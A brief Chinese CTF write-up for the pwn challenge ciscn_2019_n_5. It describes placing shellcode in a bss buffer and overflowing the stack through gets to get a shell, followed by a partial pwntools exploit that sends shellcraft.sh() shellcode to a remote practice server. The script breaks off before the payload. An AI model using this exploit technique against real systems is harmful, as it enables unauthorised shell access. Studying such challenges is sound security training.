shellcode
ciscn_2019_n_5
思路:read读取输入到bss段上的name中去,可以让程序读取shellcode,再利用后面的gets栈溢出getshell
main:
exp:
from pwn import *
from LibcSearcher import *
context.arch = 'amd64'
p = remote('node3.buuoj.cn',26505)
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
payload
原创
2020-11-28 20:11:19 ·
171 阅读 ·
0 评论